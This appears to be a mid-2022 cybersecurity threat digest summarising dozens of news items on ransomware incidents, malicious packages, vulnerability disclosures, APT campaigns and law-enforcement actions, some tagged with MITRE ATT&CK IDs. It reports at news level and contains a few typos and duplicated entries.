    In the decade’s first half, simple denial-of-service tools, such as HOIC, HULK, LOIC, and Slowloris, were the go-to choices for hackers and hacktivists worldwide. When leveraged by a group in a coordinated attack like an Anonymous operation, the threat actors could launch powerful distributed denial-of-services (DDoS) attacks, resulting in more successful campaigns. But after the publication of BASHLITE’s source code in 2015 and Mirai’s source code in 2016, threat actors abandoned these old tools. They began focusing on building their own IoT botnets capable of launching much more powerful DDoS attacks.

    Hackers Attack UK Water Supplier but Extort Wrong Victim

    South Staffordshire Water, a company supplying 330 million liters of drinking water to 1.6 consumers daily, has issued a statement confirming IT disruption from a cyberattack. As the announcement explains, the safety and water distribution systems are still operational, so the disruption of the IT systems doesn’t impact the supply of safe water to its customers or those of its subsidiaries, Cambridge Water and South Staffs Water” (Bleeping Computer, 2022). “This is thanks to the robust systems and controls over water supply and quality we have in place at all times, as well as the quick work of our teams to respond to this incident and implement the additional measures we have put in place on a precautionary basis,” explains the statement published on the company’s site.

    Software Patches Flaw on macOS Could Let Hackers Bypass All Security Levels

    An injection flaw (T1055) connected to how macOS handles software updates on the system could allow attackers to access all files on Mac devices” (Info Security Magazine, 2022). The flaw was found by macOS security specialist Patrick Wardle, who shared his findings at Black Hat. Threat actors can use the flaw to take over impacted devices. The flaw allows threat actors to escape the macOS sandbox (T1553.003) to bypass the System Integrity Protection (SIP), which enables further deployment of non-authorized code (T1059). The vulnerability was found in December of 2020, and was reported to Apple through the company’s bug bounty program.

    Malicious PyPi Packages Aim DDoS Attacks at Counter-Strike Servers

    A dozen malicious Python packages were uploaded to the PyPi repository this weekend in a typosquatting (T1036) attack that performs DDoS attacks on a Counter-Strike 1.6 server. Python Package Index (PyPi) is a repository of open-source software packages that developers can easily incorporate into their Python projects to build complex apps with minimal effort. Anyone is able to upload packages to the PyPi repository, and it can take time for malicious packages to be reported and removed. The repository has been popularly abused by threat actors who have used it to steal developer credentials, and to spread malware.

    Android Banking Malware Now Also Infects Your Smartphone With Ransomware

    An Android banking trojan has re-emerged with new features that make it more powerful and more dangerous to a wider range of users. Also, it now delivers ransomware. The Sova Android banking malware first appeared for sale in underground markets in September last year, with its author stating that it was still under development. Even so, it still packed a punch, with the ability to harvest usernames and passwords via keylogging, stealing cookies and adding false overlays to a range of apps.

    Ransomware Attack Blamed for Closure of all 7-Eleven stores in Denmark

    As Bleeping Computer reports, the company has since confirmed that it was targeted by a ransomware attack, and that it is working with police investigators. Many of 7-Eleven’s stores in Denmark have since reopened. 7-Eleven Denmark is not sharing much in the way of technical detail regarding the attack, which means that not only do we not know what family of ransomware might have caused the disruption but we also do not know how it might have entered the organization in the first place.

    Three Extradited from UK to US on $5m BEC Charges

    Three Nigerian nationals have been extradited from the UK to the US after allegedly participating in business email compromise (BEC) attacks that attempted to steal millions from American organizations, including universities. The alleged crimes cover jurisdictions in North Carolina, Texas and Virginia. They relate to Oludayo Kolawole John Adeagbo (aka John Edwards and John Dayo), 43, a Nigerian citizen and UK resident; Donald Ikenna Echeazu (aka Donald Smith and Donald Dodient), 40, a dual UK and Nigerian citizen; and Olabanji Egbinola, 42.

    A New PyPI Package Was Found Delivering Fileless Linux Malware

    Researchers from Sonatype have discovered a new PyPI package name “secretslib” that is being used to drop a fileless cryptominer (T1496) to the memory of Linux machines. The package claims “secrets matching and verification made easy.” It currently has around 93 downloads going back to August of 2020. The package is used to stealthily run cryptominers on Linux machines directly from RAM (T1620). The package fetches a Linux executable from a remote server (T1105), which drops an ELF file called “memfd” into memory (T1027.002). A Monero crypto miner is the end result.

    Over 9,000 VNC Servers Exposed Online Without a Password

    Researchers have discovered at least 9,000 exposed VNC (virtual network computing) endpoints that can be accessed and used without authentication, allowing threat actors easy access to internal networks. VNC (virtual network computing) is a platform-independent system meant to help users connect to systems that require monitoring and adjustments, offering control of a remote computer via RFB (remote frame buffer protocol) over a network connection.

    US Govt Will Pay You $10 Million for Info on Conti Ransomware Members

    On Thursday, the U.S. State Department announced that it would be paying a $10 million reward for information related to five high-ranking Conti ransomware members that could lead to their identification or whereabouts. As part of the announcement, the State Department revealed the face of one of these members, known as “Target.” The other four members are known as “Tramp”, “Dandis”, Professor”, and “Reshaev.”

    UK NHS Service Recovery May Take a Month After MSP Ransomware Attack

    On Thursday, August 4th around 7 AM, a Managed service provider (MSP) known as Advanced was the target of a ransomware attack that disrupted its systems. The attack resulted in a major outage to NHS emergency services across the United Kingdom. While Advanced did not reveal the identity of the ransomware group behind the attack, it stated that it had taken immediate action to mitigate the risk and isolate Health and Care environments where the incident was detected.

    Iron Tiger Compromises Chat Application Mimi, Targets Windows, Mac, and Linux Users

    Security researchers from TrendMicro noticed a server hosting both a HyperBro sample and a malicious Mach-O executable named “rshell.” HyperBro is a malware family used by Iron Tiger (also known as Emissary Panda, APT27, Bronze Union, and Luckymouse), an advanced persistent threat (APT) group that has been performing cyberespionage for almost a decade, and there have been no reports of this group associated with a tool for Mac operating systems (OS). We analyzed the Mach-O sample and found it to be a new malware family targeting the Mac OS platform. TM also eventually found samples compiled for the Linux platform that belongs to the same malware family.

    Automotive Supplier Breached by 3 Ransomware Gangs in 2 weeks

    An automotive supplier had its systems breached and files encrypted by three different ransomware gangs over two weeks in May, two of the attacks happening within just two hours. The attacks followed an initial breach of the company's systems by a likely initial access broker (IAB) (T1078) in December 2021, who exploited a firewall misconfiguration (T1190) to breach the domain controller server using a Remote Desktop Protocol (RDP) connection.

    Conti Extortion Gangs Behind Surge of BazarCall Phishing Attacks

    According to researchers at AdvIntel, three groups that have splintered off from the Conti ransomware operation are adopting BaZarCall phishing tactics to gain initial access to victim networks. BazarCall, otherwise known as BazaCall, is a call-back phishing scheme that emerged in early 2021 as an attack vector used by the Ryuk ransomware operation, which later rebranded into Conti. “A BazarCall attack starts with an email informing that a subscription the recipient is allegedly paying for is about to be renewed automatically and canceling the payment is possible by calling a specific number. While the social engineer distracts the victim, the intruder determines how to compromise the network without triggering any alarm”

    Cisco fixes bug allowing RSA private key theft on ASA, FTD devices

    Yesterday, Cisco released a security advisory to address a high severity vulnerability affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Software. Tracked as CVE-2022-20866, the flaw is due to the mishandling of RSA keys on ASA and FTD devices. Successful exploitation of the CVE could enable an unauthenticated attacker to retrieve an RSA private key remotely, which In turn could be used by the actor to impersonate a device running Cisco ASA Software or Cisco FTD Software or to decrypt the device traffic. “This vulnerability is due to a logic error when the RSA key is stored in memory on a hardware platform that performs hardware-based cryptography. An attacker could exploit this vulnerability by using a Lenstra side-channel attack against the targeted device. A successful exploit could allow the attacker to retrieve the RSA private key,” stated Cisco in its advisory on Wednesday.

    Cyber-criminals Shift From Macros to Shortcut Files to Hack Business PCs, HP Reports

    HP’s Wolf Security released new research in their quarterly report, which highlights a cybercriminal shift away from Office macros. According to the researchers, various malware spreading families are using shortcut (LNK) (T1204.002) files instead of Office macros, which are now blocked by default by Microsoft. “Specifically, the report shows an 11% rise in archive files containing malware, including LNK files. Further, the data suggests that 69% of malware detected was delivered via email, while web downloads were responsible for 17%

    VMware warns of public exploit for critical auth bypass vulnerability

    Last week, VMware addressed a critical authentication bypass flaw impacting several of its products including VMware Workspace ONE access, Identity Manager, and VRealize Automation. Tracked as CVE-2022-31656, a malicious actor with network access to the UI could exploit this vulnerability to gain administrative access without the need to authenticate. In addition to CVE-2022-31656, VMware also addressed a high severity SQL injection flaw (CVE-2022-31659) that could enable remote attackers to gain remote code execution.

    Microsoft Patches Windows DogWalk Zero-Day Exploited in Attacks

    As a part of the August 2022 patch Tuesday, Microsoft fixed 121 vulnerabilities including 17 critical ones allowing for remote execution and privilege escalation. One of the security flaws addressed by Microsoft is a high severity Windows zero-day vulnerability (CVE-2022-34713) that is being actively exploited in the wild. Dubbed DogWalk, the flaw is related to a path traversal weakness in the Windows Support Diagnostic Tool (MSDT). Successful exploitation of this zero-day could enable threat actors to gain remote code execution on compromised systems when MSDT is called using the URL protocol from a calling application, typically Microsoft Word.

    KillNet Hacking Group Allegedly Targets Lockheed Martin and NASA

    On the groups telegram page, KillNet claims to have taken down websites connected with both Lockheed Martin and NASA. While the group uploaded a short video showing the alleged websites being down, the websites are operational at the time of this writing. KillNet has previously expressed their intent to target Lockheed Martin and other entities who have supported Ukraine during the current Russian invasion. KillNet has also claimed, without proof, to have dumped the data of job applicants for Lockheed Martin.

    U.S. Sanctions Virtual Currency Mixer Tornado Cash for Alleged Use in Laundering

    On Monday, the U.S. Treasury Department imposed sanctions on Tornado Cash, a crypto mixing service that is being used by cybercriminals to launder stolen money. Tornado cash allows its users to move cryptocurrency assets between accounts by obfuscating their origin and destination. Since its creation in 2019, the platform has been used to launder more than $7.6 billion worth of virtual assets. According to blockchain analytics firm Elliptic, thefts, hacks, and fraud account for $1.5 billion of the total assets sent through the mixer.

    New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack

    A new IoT botnet malware dubbed RapperBot has been observed rapidly evolving its capabilities since it was first discovered in mid-June 2022. The malware, which gets its name from an embedded URL to a YouTube rap music video in an earlier version, is said to have amassed a growing collection of compromised SSH servers, with over 3,500 unique IP addresses used to scan and brute-force their way into the servers.

    LogoKit Update – The Phishing Kit Leveraging Open Redirect Vulnerabilities

    Threat actors have been leveraging Open Redirect Vulnerabilities in online services and applications to bypass spam filters and deliver phishing messages. This information comes from researchers at Resecurity, they found highly trusted domains such as Snapchat and other online services were being used in attacks against several financial institutions and other online services internationally.

    Slack Admits to Leaking Hashed Passwords for Five Years

    Popular collaboration tool Slack (not to be confused with the nickname of the world’s longest-running Linux distro, Slackware) has just owned up to a long-running cybersecurity SNAFU. According to a news bulletin entitled Notice about Slack password resets, the company admitted that it had inadvertently been oversharing personal data “when users created or revoked a shared invitation link for their workspace.” >From 2017-04-17 to 2022-07-17, Slack said that the data sent to the recipients of such invitations included the sender’s hashed password. Slack’s security advisory doesn’t explain the breach very clearly, saying merely that “[t]his hashed password was not visible to any Slack clients; discovering it required actively monitoring encrypted network traffic coming from Slack’s servers.

    Zero-Day Bug Responsible for Massive Twitter Breach

    A zero-day vulnerability in Twitter’s code base was responsible for a major data breach that is thought to have affected 5.4 million users, the social media firm has revealed. The threat actor was hoping to sell the profile data for $30,000 on a cybercrime site. Some information was scraped from public Twitter profiles, including location and image URL. However, they were crucially able to link account emails and phone numbers with account IDs by leveraging the vulnerability.

    North Korean Hackers Target Crypto Experts With Fake Coinbase Job Offers

    A new social engineering campaign by the notorious North Korean Lazarus hacking group has been discovered, with the hackers impersonating Coinbase to target employees in the fintech industry. A common tactic the hacking group uses is to approach targets over LinkedIn to present a job offer and hold a preliminary discussion as part of a social engineering attack.

    Chinese Hackers Use New Windows Malware to Backdoor Govt, Defense Orgs

    An extensive series of attacks detected in January used new Windows malware to backdoor government entities and organizations in the defense industry from several countries in Eastern Europe. Kaspersky linked the campaign with a Chinese APT group tracked as TA428, known for its information theft and espionage focus and attacking organizations in Asia and Eastern Europe [1, 2, 3, 4]. The threat actors successfully compromised the networks of dozens of targets, sometimes even taking control of their entire IT infrastructure by hijacking systems used to manage security solutions.

    Hacker Finds Kill Switch for Submachine Gun Wielding Robot Dog

    In July, a video of a robot dog with a submachine gun strapped to its back terrified the internet. Now a hacker who posts on TwHomeitter as KF@d0tslash and GitHub as MAVProxyUser has discovered that the robot dog contains a kill switch, and it can be accessed through a tiny handheld hacking device. “Good news!” d0tslash said on Twitter. “Remember that robot dog you saw with a gun!? It was made by @UnitreeRobotic. Seems all you need to dump it in the dirt is @flipper_zero. The PDB has a 433mhz backdoor.”

    Critical RCE vulnerability Impacts 29 Models of DrayTek Routers

    On Wednesday, the research team at Trellix disclosed details of an unauthenticated remote code execution vulnerability affecting multiple DrayTek routers (Vigor 3910 and 28 other DrayTek models sharing the same codebase). Tracked as CVE-2022-32548, the flaw received a CVSS score of 10/10, indicating a critical level of severity. “The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing. A one-click attack can also be performed from within the LAN in the default device configuration,” stated Philippe Laulheret, a senior security researcher at Trellix.

    Thousands of hackers flock to 'Dark Utilities' C2-as-a-Service

    Security researchers found a new service called Dark Utilities that provides an easy and inexpensive way for cybercriminals to set up a command and control (C2) center for their malicious operations. A C2 server is how adversaries control their malware in the wild, sending out commands, configurations and new payloads, and receiving data collected from compromised systems. The Dark Utilities service provides threat actors a platform that supports Windows, Linux, and Python-based payloads, and eliminates the effort associated with implementing a C2 communication channel.

    CISA adds Zimbra email bug to Known Exploited Vulnerabilities Catalog

    The Cybersecurity & Infrastructure Security Agency (CISA) has added a recently disclosed flaw in the Zimbra email suite, tracked as CVE-2022-27924, to its Known Exploited Vulnerabilities Catalog. In middle June, researchers from Sonarsource discovered the high-severity vulnerability impacting the Zimbra email suite, tracked as CVE-2022-27924 (CVSS score: 7.5). It can be exploited by an unauthenticated attacker to steal login credentials of users without user interaction.

    Open Redirect Flaw Snags Amex, Snapchat User Data

    Attackers are exploiting a well-known open redirect flaw to phish people’s credentials and personally identifiable information (PII) using American Express and Snapchat domains, researchers have found. Threat actors impersonated Microsoft and FedEx among other brands in two different campaigns, which researchers from INKY observed from mid-May through late July, they said in a blog post published online. Attackers took advantage of redirect vulnerabilities affecting American Express and Snapchat domains, the former of which eventually was patched while the latter still is not, researchers said.

    Cisco Fixes Critical Remote Code Execution Bug in VPN Routers

    Yesterday, Cisco rolled out fixes to address several vulnerabilities impacting its Small business VPN routers. In total, Cisco addressed 3 vulnerabilities, which have been tracked as CVE-2022-20842 (RCE & DoS vulnerability), CVE-2022-20827 (command injection vulnerability), and CVE-2022-20841 (command injection vulnerability). The exploitation of these bugs could enable unauthenticated, remote attackers to execute arbitrary code or commands and trigger denial of service conditions on vulnerable devices.

    Russian Organizations Attacked With New Woody Rat Malware

    Russian entities are being targeted by unknown attackers to spread a newly discovered malware that allows them to remotely control and steal information from compromised devices. Dubbed Woody Rat, the remote access trojan comes with a wide range of capabilities including collecting system information, listing folders and running processes, executing commands and files received from its command-and-control (C2) server, downloading, uploading, and deleting files on infected machines, and taking screenshots.

    Hackers deploy new ransomware tool in attacks on Albanian government websites

    Hackers apparently angry over the Iranian opposition group Mojahedin-e Khalq’s upcoming conference in Albania carried out disruptive cyberattacks on Albanian government sites last month, researchers from the cybersecurity firm Mandiant said Thursday. Based on the timing of the attacks in July, technical indicators associated with the malware and the focus on MEK, the researchers are moderately confident that hackers working to further the Iranian government’s goals were behind the attack, they said. The attacks, which forced the government of Albania to shut down online access to multiple government services, may have included a previously unknown backdoor called “ChimneySweep,” and a newly discovered ransomware tool known as “RoadSweep” to attack the government systems, the researchers said.

    QNAP Poisoned XML Command Injection (Silently Patched)

    CVE-2020-2509 was added to CISA’s Known Exploited Vulnerabilities Catalog in April 2022, and it was listed as one of the “Additional Routinely Exploited Vulnerabilities in 2021” in CISA’s 2021 Top Routinely Exploited Vulnerabilities alert. However, CVE-2020-2509 has no public exploit, and no other organizations have publicly confirmed exploitation in the wild.

    VMware Urges Admins to Patch Critical Auth Bypass Bug Immediately

    Yesterday, VMware released a security advisory to address a critical authentication bypass flaw affecting local domain users in several VMware products. Tracked as CVE-2022-31656, the flaw received a CVSS score of 9.8/10 and impacts VMware Workspace ONE Access, Identity Manager, and vRealize Automation. If exploited successfully, “a malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate,” stated VMware in its advisory.

    Chinese Hackers Use New Cobalt Strike-Like Attack Framework

    Researchers at Cisco Talos recently uncovered a new post-exploitation attack framework that is being deployed in the wild as an alternative to the widely abused Cobalt Strike toolset. Dubbed Manjusaka, the framework uses implants written in the cross-platform Rust programming language, while its binaries are written in GoLang. Manjusaka comes with a RAT and file management module, each featuring distinct capabilities. Similar to Cobalt Strike, its RAT implant supports command execution, file access, network reconnaissance, and more.

    LOLI Stealer – Golang-Based InfoStealer Spotted In The Wild

    Cyble Research Labs has been actively monitoring various Stealers and blogging about them to keep our readers aware and informed. Recently, we came across a malware sample which turned out to be a new malware variant named “LOLI Stealer.”

    The TA sells this stealer for fairly low prices, as listed below:

  • 499 rubles (~9USD) – a month
  • 799 rubles (~14USD) – 2 months
  • 1499 rubles (~25USD) – lifetime + universal sorter as a gift

    Through the course of research, they’ve identified over 20 different samples related to LOLI malware since June 2022, indicating that the malware has been actively deployed in recent weeks.

  • Solana Hack Wipes More Than 7,000 Wallets, Totaling Nearly $5 Million in Losses

    An unidentified hacker used an exploit to drain funds from more than 7,000 cryptocurrency wallets on the Solana blockchain as of Wednesday morning. Solana confirmed on Twitter the extent of the hack that began Tuesday night. Outside cryptocurrency analysis firms have placed the losses at roughly $5 million worth of Solana currencies. Solana has not provided its own estimate. Solana says it has not yet identified the source of the exploit and is still investigating the attack. However, it appears to have affected “a software dependency shared by several software wallets,” Solana head of communications Austin Federa wrote on Twitter Tuesday night. The exploit allowed the attacker to sign transactions as users themselves, suggesting private keys were compromised. Researchers at cryptocurrency analysis firm Elliptic also suggested the attack was software-based.

    Browser Synchronization Abuse: Bookmarks as a Covert Data Exfiltration Channel

    Two universal and seemingly innocuous browser features – the ability to create bookmarks (aka “favorites”) and browser synchronization – make users’ lives easier, but may also allow hackers to establish a covert data exfiltration channel. Malicious browser extensions are a known and widespread threat, used by attackers to perform actions such as stealing passwords, exfitrating email data or delivering additional malware. Some attackers have also recently managed to exploit Chrome’s syncing feature and use an extension to connect their computer directly to a targeted workstation, creating a covert channel for remote data manipulation, but also (concievably) for data exfiltration and C&C communication.

    Millions of Arris Routers are Vulnerable to Path Traversal Attacks

    Security researcher Derek Abdine has published an advisory about vulnerabilities that exist in the MIT-licensed muhttpd web server. This web server is present in Arris firmware which can be found in several router models. muhttpd (mu HTTP deamon) is a simple but complete web server written in portable ANSI C. It has three major goals: Be simple, be portable, and be secure. Simplicity was the main goal for muhttpd, but because of its simplicity and broad use, it also must prioritize security.

    Over 3,200 Apps Leak Twitter API Keys, Some Allowing Account Hijacks

    Security researchers at CloudSEK, uncovered thousands of mobile applications that are exposing Twitter API keys to the public. In turn, these keys could enable threat actors to take over users’ Twitter accounts that are associated with the app. The discovery was made possible after CloudSEK examined large app sets for potential data leaks. To their surprise, researchers uncovered 3,207 apps leaking a valid Consumer Key and Consumer Secret for the Twitter API.

    EU Missile Maker MBDA Confirms Data Theft Extortion, Denies Breach

    On July 30, 2022, a group of hackers who operate under the name “Andrastea” took to a popular hacking forum, claiming they had breached MBDA by leveraging critical network vulnerabilities. MBDA is one of the largest missile developers and manufacturers in Europe. It currently makes 45 different missile types, with another 15 in development, including air-to-air, surface-to-air, air-to-surface, anti-ship, anti-tank, and multiple-launcher systems.

    Australian Hacker Charged with Creating, Selling Spyware to Cyber Criminals

    A 24-year-old Australian national has been charged for his purported role in the creation and sale of spyware for use by domestic violence perpetrators and child sex offenders. Jacob Wayne John Keen, who currently resides at Frankston, Melbourne, is said to have created the remote access trojan (RAT) when he was 15, in addition to working as the administrator for the tool from 2013 until its shutdown in 2019 by the authorities.

    BlackCat Ransomware Claims Attack on European Gas Pipeline

    The ALPHV ransomware gang, aka BlackCat, claimed responsibility for a cyberattack against Creos Luxembourg S.A. last week, a natural gas pipeline and electricity network operator in the central European country. Creos’ owner, Encevo, who operates as an energy supplier in five EU countries, announced on July 25 that they had suffered a cyberattack the previous weekend, between July 22 and 23. While the cyberattack had resulted in the customer portals of Encevo and Creos becoming unavailable, there was no interruption in the provided services.

    Akamai: We stopped Record DDoS Attack in Europe

    Akamai Technologies squelched the largest-ever distributed denial-of-service (DDoS) attack in Europe earlier this month against a company that was being consistently hammered over a 30-day period. According to the cybersecurity and cloud services vendor, the height of the attack hit on July 21, when over a 14-hour period it peaked at 659.6 million packets per second (Mpps) and 853.7 gigabits per second (Gbps).

    There Is an Increase in Smishing Attacks, FCC Warns

    The independent agency of the United States federal government Federal Communications Commission (FCC) alerted mobile users to an uptick in SMS (Short Message Service) phishing campaigns that aim to steal their money and snatch their private data. Threat actors behind these types of attacks, also known as smishing or robotexts, may employ a variety of enticements to deceive targets into disclosing sensitive information. As defined in one of our previous articles, smishing is a type of phishing attack in which cybercriminals use text messages to trick their victims into opening malicious attachments or clicking on malicious links.

    Dahua IP Camera Vulnerability Could Let Attackers Take Full Control Over Devices

    On Thursday, Nozomi Networks disclosed details of a vulnerability in Dahua’s Open Network Video Interface (ONVIF) Forum Standard implementation, which, when exploited, can lead to seizing control of IP cameras. Tracked as CVE-2022-30563, the flaw received a CVSS score of 7.4, indicating a high level of severity. According to Nozomi Networks, the vulnerability could be abused by attackers to “compromise network cameras by sniffing a previous unencrypted ONVIF interaction and replaying the credentials in a new request towards the camera.”

    Spanish Police Arrest Alleged Radioactive Monitoring Hackers

    Spanish Law enforcement officials recently arrested two individuals suspected of hacking the country’s Radioactivity Alert Network (RAR). RAR is a network of gamma radiation sensors that is operated by Spain’s General Directorate of Civil Protection and Emergencies (DGPCE). The system is deployed in certain parts of Spain, especially near nuclear power plants, in order to monitor excessive radiation levels.

    Microsoft Experts Linked the Raspberry Robin Malware to Evil Corp Operation

    On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via Raspberry Robin malware. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices (T1091)” (Security Affairs, 2022). The malware was first spotted in September of 2021. It’s malicious code uses Windows Installer (T1543.003) to reach out to QNAP-associated domains to download a malicious DLL (T1105). It uses TOR exit nodes as a backup C2 infrastructure (T1090.003). It has been targeting the technology and manufacturing industries, through infected removable drives, most commonly USB devices.

    Exploitation Is Underway for a Critical Flaw in Atlassian Confluence Server and Data Center

    Recenlty Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed the Questions for Confluence app (versions 2.7.34, 2.7.35, and 3.0.2), a Confluence user account with the username “disabledsystemuser” is created. The account allows administrators to migrate data from the app to Confluence Cloud. The bad news is that the account is created with a hard-coded password and is added to the confluence-users group, which allows viewing and editing all non-restricted pages within Confluence by default.

    New ‘Robin Banks’ phishing service targets BofA, Citi, and Wells Fargo

    A new phishing as a service (PhaaS) platform named 'Robin Banks' has been launched, offering ready-made phishing kits targeting the customers of well-known banks and online services. The targeted entities include Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, Lloyds Bank, the Commonwealth Bank in Australia, and Santander. Additionally, Robin Banks offers templates to steal Microsoft, Google, Netflix, and T-Mobile accounts.

    Hackers Opting New Attack Methods After Microsoft Blocked Macros by Default

    With Microsoft taking steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default across Office apps, malicious actors are responding by refining their new tactics, techniques, and procedures (TTPs). According to ProofPoint, “the use of VBA and XL4 Macros decreased approximately 66% from October 2021 through June 2022.” In its place, adversaries are increasingly pivoting away from macro-enabled documents to other alternatives, including container files such as ISO and RAR as well as Windows Shortcut (LNK) files in campaigns to distribute malware.

    1,000s of Phishing Attacks Blast Off From InterPlanetary File System

    The peer-to-peer network IPFS offers an ingenious base for cyberattacks and is seeing a stratospheric increase in malicious hosting. The distributed, peer-to-peer (P2P) InterPlanetary File System (IPFS) has become a hotbed of phishing-site storage: Thousands of emails containing phishing URLs utilizing IPFS are showing up in corporate inboxes. According to a report from Trustwave SpiderLabs, the company found more than 3,000 of these emails within its customer telemetry in the last three months. They lead victims to fake Microsoft Outlook login pages and other phishing webpages.

    Cybercriminals are Using Messaging Apps to Launch Malware Schemes

    According to research by Intel 471, threat actors are using Discord and Telegram to spread malware. These apps have elements which allow users to create and share programs inside the platform. Using the platform as a host, threat actors can distribute and execute malware (T1204.002) that allows them to steal credentials or other information from an unsuspecting user. Intel 471 researchers have discovered several information stealers that are freely available for download that rely on Discord or Telegram for their functionality.

    Hackers Scan for Vulnerabilities Within 15 Minutes of Disclosure

    System administrators have even less time to patch disclosed security vulnerabilities than previously thought, as a new report shows threat actors scanning for vulnerable endpoints within 15 minutes of a new CVE being publicly disclosed. According to Palo Alto's 2022 Unit 42 Incident Response Report, hackers are constantly monitoring software vendor bulletin boards for new vulnerability announcements they can leverage for initial access to a corporate network or to perform remote code execution.

    Microsoft: IIS extensions increasingly used as Exchange backdoors

    Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells. Because they're hidden deep inside the compromised servers and often very hard to detect being installed in the exact location and using the same structure as legitimate modules, they provide attackers' with a perfect and durable persistence mechanism.

    Threat Actor "Beeper" Plans Attacks Against Clients Of Unspecified Managed Service Provider

    A threat actor going by 'Beeper' is allegedly seeking a partner to coordinate a cyber attacks against an unspecific managed service provider (MSP). The post was noticed by security researchers at ZeroFox, who found the message on a Russian language dark web forum called exploit[.]in. The actor claims to have access to the MSP’s administrative panel. According to the threat actors, the MSP manages 50 different US based companies located in the same time zone. The resources impacted include over 100 VMware ESXi instances and 1,000 servers that likely contain sensitive data.

    No More Ransom Helped More Than 1.5 Million People Decrypt Their Devices

    Woburn, MA – July 26, 2022 – No More Ransom, the initiative launched to help victims of ransomware decrypt their files, has celebrated its six-year anniversary. Since the launch, it has grown from four partners to 188 and has contributed 136 decryption tools covering 165 ransomware families. In doing so, it has helped more than 1.5 million people decrypt their devices all over the world, with the project available in 37 languages.

    Threat Actor "Beeper" Plans Attacks Against Clients Of Unspecified Managed Service Provider

    Untested threat actor “Beeper” is seeking a partner to coordinate a large-scale cyber-attack against the clients of an unspecified managed service provider (MSP) on the Russian language Deep Web forum exploit[.]in. The actor claims to have access to the MSP’s administrative panel, where they currently manage resources for more than 50 different U.S.-based companies located in approximately the same time zone. These resources allegedly include more than 100 VMware instances and 1,000 servers that almost certainly contain sensitive data.

    Critical FileWave MDM Flaws Open Organization-Managed Devices to Remote Hackers

    On Monday, Claroty disclosed two critical security flaws impacting FiveWave’s mobile device management system that could be leveraged to carry out remote attacks and seize control of devices connected to the system. “The vulnerabilities are remotely exploitable and enable an attacker to bypass authentication mechanisms and gain full control over the MDM platform and its managed devices," Claroty security researcher Noam Moshe said in a report.

    CosmicStrand, A New Sophisticated UEFI Firmware Rootkit Linked to China

    Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. While the initial attack vector is unclear, the rootkit has been located on firmware images of Gigabyte and ASUS motherboards, which are designed using the H81 chipset (T1542.001). It is likely a common vulnerability is being exploited by attackers to inject the rootkit into the firmware’s image. “In these firmware images, modifications have been introduced into the CSMCORE DXE driver, whose entry point has been patched to redirect to code added in the .reloc section. This code, executed during system startup (T1547), triggers a long execution chain which results in the download and deployment of a malicious component inside Windows.” reads the analysis published by the experts. “Looking at the various firmware images we were able to obtain, we assess that the modifications may have been performed with an automated patcher. If so, it would follow that the attackers had prior access to the victim’s computer in order to extract, modify and overwrite the motherboard’s firmware.

    Lockbit Ramps Up Attacks on Public Sector

    The prolific Lockbit ransomware gang appears to have claimed another two scalps in recent days: the Canadian town of St Marys and the Italian tax agency. The local administration at St Marys explained in an update on Friday that the attack occurred last Wednesday, locking an internal server and encrypting data on it. “Upon learning of the incident, staff took immediate steps to secure any sensitive information, including locking down the town’s IT systems and restricting access to email. The town also notified its legal counsel, the Stratford Police Service and the Canadian Centre for Cyber Security,” a statement read.

    North Korean Hackers Attack EU Targets With Konni Rat Malware

    Researchers at Securonix recently uncovered a campaign that is targeting high-value organizations in the Czech Republic, Poland, and other European countries with Konni malware. Konni is a remote access trojan that has been associated with North Korean cyberattacks since 2014. Like any other RAT, Konni is capable of establishing persistence and performing privilege escalation on the host.

    Amadey Malware Pushed via Software Cracks in SmokeLoader Campaign

    A new version of the Amadey Bot malware is distributed through the SmokeLoader malware, using software cracks and keygen sites as lures (T1608.001). Amadey Bot is a malware strain discovered four years ago, capable of performing system reconnaissance, stealing information, and loading additional payloads. Amadey has been around for some time, but it’s distribution dwindled in 2020. Korean researchers at AhnLab found that a new strain of Amadey is being spread by the SmokeLoader malware. Amadey had historically used a piece of malware called Fallout as well as the Rig exploit kit. ”SmokeLoader is downloaded and executed voluntarily by the victims, masked as a software crack or keygen.

    Google Chrome Now! New Version Includes 11 Important Security Patches

    The latest Google Chrome update includes 11 security fixes, some of which could be exploited by an attacker to take control of an affected system. Google Chrome’s Stable channel has been updated to 103.0.5060.134 for Windows, Mac, and Linux, and the new version will roll out over the coming days/weeks. Of the 11 security fixes five are use-after-free issues, including four that are marked with a severity of “high.” Use after free (UAF) vulnerabilities occur because of the incorrect use of dynamic memory during a program’s operation.

    Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists

    Earlier this month, Google addressed a high severity zero-day vulnerability impacting its Chrome browser. Tracked as CVE-2022-2294, the flaw is related to a memory corruption bug in the WebRTC component of Chrome browser which, if successfully exploited, could lead to shellcode execution on the target device. While Google stated that the vulnerability was being exploited in attacks in the wild, the tech firm did not disclose the details of such attacks.

    Hackers Breach Ukrainian Radio Network to Spread Fake News About Zelensky

    Ukrainian media group TAVR Media confirmed on Thursday that it was hacked to spread fake news about President Zelenskiy being in critical condition and under intensive care. The company stated on Facebook that the cyber attack was carried out on the servers and networks of TAVR Media radio stations. According to the State Service of Special Communications and Information Protection of Ukraine (SSCIP), the network operates nine major Ukrainian radio stations, including Hit FM, Radio ROKS, KISS FM, Radio RELAX, Melody FM, Nashe Radio, Radio JAZZ, Classic Radio, and Radio Bayraktar.

    Qakbot Resurfaces With New Playbook

